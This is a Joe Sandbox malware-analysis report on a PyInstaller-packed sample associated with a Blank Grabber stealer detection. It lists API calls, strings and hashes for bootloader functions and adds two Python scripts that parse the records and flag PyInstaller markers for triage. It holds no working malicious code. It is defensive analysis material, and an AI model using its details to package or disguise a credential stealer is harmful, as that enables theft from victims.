• Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction ID: b6a4aff4207acfc08c7b17e42b1ccb9ea619be30a6cd658304911a804c79d122
• Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
• Instruction Fuzzy Hash: 9E31D233B18B4146E620BB25B8102AB66A5BFC8BC8F510136EF8DD3769EE3CD546D700
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDBD
• GetLastError.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDCB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDF5
• FreeLibrary.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDE63
• GetProcAddress.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDE6F
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction ID: b5f057513ad7c429baf6fe7236e841eaa1a2582cb6aaeadf118356a3fa000bc3
• Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
• Instruction Fuzzy Hash: C331C323F2B642D5EE62AB02A84057523D4FF98BA0F694575DD1E873A0EF3CE444E714
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
• Instruction ID: 371de4d3051e5fa0828b243f2b3739cad3ef787a7fcc830c3c5c8f456271bebf
• Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
• Instruction Fuzzy Hash: 7F417233A38A8691EA11FB24E4542E96321FFD4384FA00572EA5DC36E5EF3CE545D740
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF67AED351A,?,00000000,00007FF67AED3F23), ref: 00007FF67AED2AA0
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
• Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction ID: 4377176696c53ce16cf0882ff76c75e658a25a1a24eddef29f3dccdfce8cf4f9
• Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
• Instruction Fuzzy Hash: A2218173B2878186E660EB61F8417EA63A4FB887C4F400176EE8C97669DF3CD545D740
APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
• Instruction ID: b3dafb40df55a1660027b11f7531067e0e2004e04927585f42f1707e75534f3b
• Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
• Instruction Fuzzy Hash: E721A423F3D24682FA547765665113D63425F487B0F4087B8D87EC76FADE2DB800A300
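The function records above all come from the main image of process 5 (base 00007FF67AED0000) and carry PyInstaller bootloader strings (`[PYI-%d:ERROR]`, `[PYI-%d:%s]`, `Failed to load Python DLL '%ls'.`, `ucrtbase.dll`, the `api-ms-` prefix check before `LoadLibraryExW`/`GetProcAddress`): this process is the PyInstaller stub that unpacks and runs a Python payload, which fits the Blank Grabber detection, and the stealer logic itself lives in the embedded archive rather than in these bootloader functions. The following script is an added example, not part of the Joe Sandbox report or its tooling; it parses records in this report format and flags functions carrying such strings. The marker list and the assumption that the leading field of a dump name is the analysed process index are ours, and the embedded SAMPLE is a trimmed copy of the records above used as constructed test input.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag PyInstaller bootloader code.
Added example, not Joe Sandbox tooling; SAMPLE is a trimmed copy of records from this
report (constructed test input) and PYI_MARKERS is our own list of bootloader strings."""
import re
from dataclasses import dataclass, field

# Format strings the PyInstaller bootloader (pyi_utils.c / pyi_pylib.c) emits. Seeing them
# means the dumped process is a PyInstaller-packed Python program, which is how Blank
# Grabber ships; the stealer itself sits in the embedded archive, not in these functions.
PYI_MARKERS = ("[PYI-%d:ERROR]", "[PYI-%d:%s]", "Failed to load Python DLL",
               "Path of Python shared library")
# "Func.MODULE(args), ref: ADDR" or "Func.MODULE ref: ADDR"
API_RE = re.compile(r"^(?P<func>\w+)\.(?P<mod>\w+)(?:\(.*\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "Source File": "source_file"}

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)  # (module, function, call-site address)
    api_id: str = ""
    string_id: str = ""
    source_file: str = ""

    @property
    def strings(self):
        # Joe Sandbox joins strings with '$', so a literal '$' (CONOUT$) is ambiguous;
        # drop empty pieces instead of guessing.
        return [s for s in self.string_id.split("$") if s]

    @property
    def process_index(self):
        # Assumption: dump names begin with the analysed process index ("00000005." -> 5).
        return int(self.source_file.split(".")[0]) if self.source_file else None

def parse_records(text):
    """Split report text into one FunctionRecord per function block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        # 'APIs'/'Strings' opens a new record unless the current record has no dump
        # source yet (then it is just the 'Strings' sub-heading of the same record).
        if line in ("APIs", "Strings") and (cur is None or cur.source_file):
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["mod"], m["func"], m["ref"]))
            continue
        key, sep, value = line.partition(":")
        if sep and key in FIELDS:
            value = value.strip()
            if key == "Source File":
                value = value.split(",")[0]  # drop ", Offset: ..., based on PE: true"
            setattr(cur, FIELDS[key], value)
    return records

def pyinstaller_hits(records):
    """Return [(record, matched markers)] for functions carrying bootloader strings."""
    hits = []
    for rec in records:
        found = [mk for mk in PYI_MARKERS if any(mk in s for s in rec.strings)]
        if found:
            hits.append((rec, found))
    return hits

def summarize(text):
    recs = parse_records(text)
    hits = pyinstaller_hits(recs)
    return {"records": len(recs), "pyinstaller_functions": len(hits),
            "processes": sorted({r.process_index for r, _ in hits if r.process_index is not None}),
            "imports": sorted({f"{mod}!{fn}" for r in recs for mod, fn, _ in r.apis})}

SAMPLE = """\
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,00007FF67AED3804), ref: 00007FF67AED2C9E
• FormatMessageW.KERNEL32(?,?,?,00007FF67AED3804), ref: 00007FF67AED2D63
• MessageBoxW.USER32 ref: 00007FF67AED2D99
Strings
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF67AEDDFEA), ref: 00007FF67AEDDDBD
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
Strings
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$ucrtbase.dll
APIs
Strings
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
"""
```

Run `summarize(open("report.txt").read())` on a saved copy of the report's function listing to get the record count, how many functions carry bootloader markers, which process indices they belong to, and the imports the records reference; the hits point at bootloader code, so triage effort is better spent on the extracted Python archive than on these functions.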
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction ID: f2c001754ce52c869f1f78d269904091fc8490a119545717540ad6e2a4d1ca74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3119622738A4586F7909B56F85432A72A0FB88BE4F044278E99DC77B4DF3CD904CB40
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED85E9
  • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8678
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED86E4
• FreeLibrary.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED86F5
• FreeLibrary.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED870A
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction ID: 9819618471a886dc4fa41f6e6b7f67562f5b703341253065479d7fed40770dea
• Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction Fuzzy Hash: C841CF63B2868245EA30BB22A5406AA63A4FFC4BD5F140175DF9CD7BE9DE3CE401D700
APIs
• GetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB347
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB37D
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3AA
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3BB
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3CC
• SetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3E7
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
• Instruction ID: 3ea4bef323f937b941fbc38cf24f40855ece8a63cd2bf493774a51f5250fe4b0
• Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
• Instruction Fuzzy Hash: 2B116023A3C68686FA547721A69213D63429F547B0F5487B4E87EC77F6EF7CA801A301
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction ID: 53645361959c1f61712c409df583daee2172ff76b51b76878582efcb6a787fd9
• Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction Fuzzy Hash: D831DF23B28A8156E720B761B8406EA6394BFC87D4F500136EE8DC7769EF3CD586D700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction ID: 1717989dcef1fe0b0ce6d70bb1669abe5fa85ad4e4ca767f3c6169505f7406a5
• Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction Fuzzy Hash: 3E315E73628A8289EB60EB21F8552FA6360FF88784F544175EA4D8BB69DF3CD104D700
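The entries above are Joe Sandbox's per-function metadata for the process-5 dump: each entry opens with its API call list (call sites as "ref:" addresses, callee attributions as "Part of subcall function"), and the strings the function references appear in the Similarity block joined with '$' in the String ID line, since the Strings sections came through empty here. Two of those strings, "[PYI-%d:ERROR]" and "Unhandled exception in script", are strings compiled into the PyInstaller bootloader's error path (the %d is the PID, which is why GetCurrentProcessId sits next to the format call, and the second is the caption of its fatal MessageBoxW). The following Python is an added example, not part of the report and not Joe Sandbox code: it parses entries in this shape into records and flags the bootloader markers. SAMPLE is constructed from lines on this page and trimmed; the regexes, record names and the marker list are this example's own assumptions about the format, not a Joe Sandbox API.

```python
"""Parse Joe Sandbox function entries (the APIs / Strings / Similarity
blocks on this page) and flag PyInstaller bootloader strings.
Added example, not Joe Sandbox code; SAMPLE is constructed from this page."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED85E9
  • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8678
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF67AED918F,?,00007FF67AED3C55), ref: 00007FF67AED2BA0
• MessageBoxW.USER32 ref: 00007FF67AED2C2A
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
"""

# "• Name.MODULE(args), ref: ADDR", optionally attributed to a callee via
# "Part of subcall function ADDR: ".  MessageBoxW.USER32 has no argument list.
_API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
_KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s?(?P<value>.*)$")
_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Strings compiled into the PyInstaller bootloader's error path: the "[PYI-%d:ERROR]"
# log prefix (%d is the PID) and the caption of its fatal MessageBoxW.
PYINSTALLER_MARKERS = ("[PYI-", "Unhandled exception in script")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                       # call-site address inside the dump
    args: list[str]
    subcall_of: str | None = None  # callee address when attributed to a subcall


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> list[str]:
        # API names the function calls itself, subcall attributions excluded
        return [a.name for a in self.apis if a.subcall_of is None]


def parse_report(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in _SECTIONS:
            if line == "APIs":          # every function entry opens with its API list
                entries.append(FunctionEntry())
            section = line
            continue
        if not entries:
            continue                    # stray lines before the first entry
        cur = entries[-1]
        if section == "APIs" and (m := _API_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"].upper(), args, m["caller"]))
        elif section == "Similarity" and (m := _KV_RE.match(line)):
            key, value = m["key"].strip(), m["value"].strip()
            cur.similarity[key] = value
            if key == "String ID" and value:
                # Joe Sandbox joins the referenced strings with '$'; a string that
                # itself contains '$' (CONOUT$ above) is ambiguous in this format.
                cur.strings = value.split("$")
    return entries


def pyinstaller_indicators(entries: list[FunctionEntry]) -> list[tuple[str, str]]:
    # (Opcode ID, string) for every entry whose strings carry a bootloader marker
    return [(e.similarity.get("Opcode ID", ""), s) for e in entries for s in e.strings
            if any(marker in s for marker in PYINSTALLER_MARKERS)]


if __name__ == "__main__":
    print(pyinstaller_indicators(parse_report(SAMPLE)))
```

Run against the full function list of a dump, the Opcode IDs returned by pyinstaller_indicators() give stable handles for the bootloader functions, which can then be excluded when comparing the remaining functions (by Instruction Fuzzy Hash) against other PyInstaller-packed samples so that only the payload-specific code is compared.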
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF67AED918F,?,00007FF67AED3C55), ref: 00007FF67AED2BA0
• MessageBoxW.USER32 ref: 00007FF67AED2C2A
Strings
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction ID: 22a8aeda325637f0f7a4286d6e2e49398fc0a6d64678d57fa4b50c052c19b07c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121AE73B28B8186E751AB64F8447AA63A4EB887C0F404136EA8D97669DE3CD645C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF67AED1B99), ref: 00007FF67AED2760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction ID: f42d368d94af0c0089e971c35a4c8b767c54bc6d587e7b9ea4957c78d539e5f5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
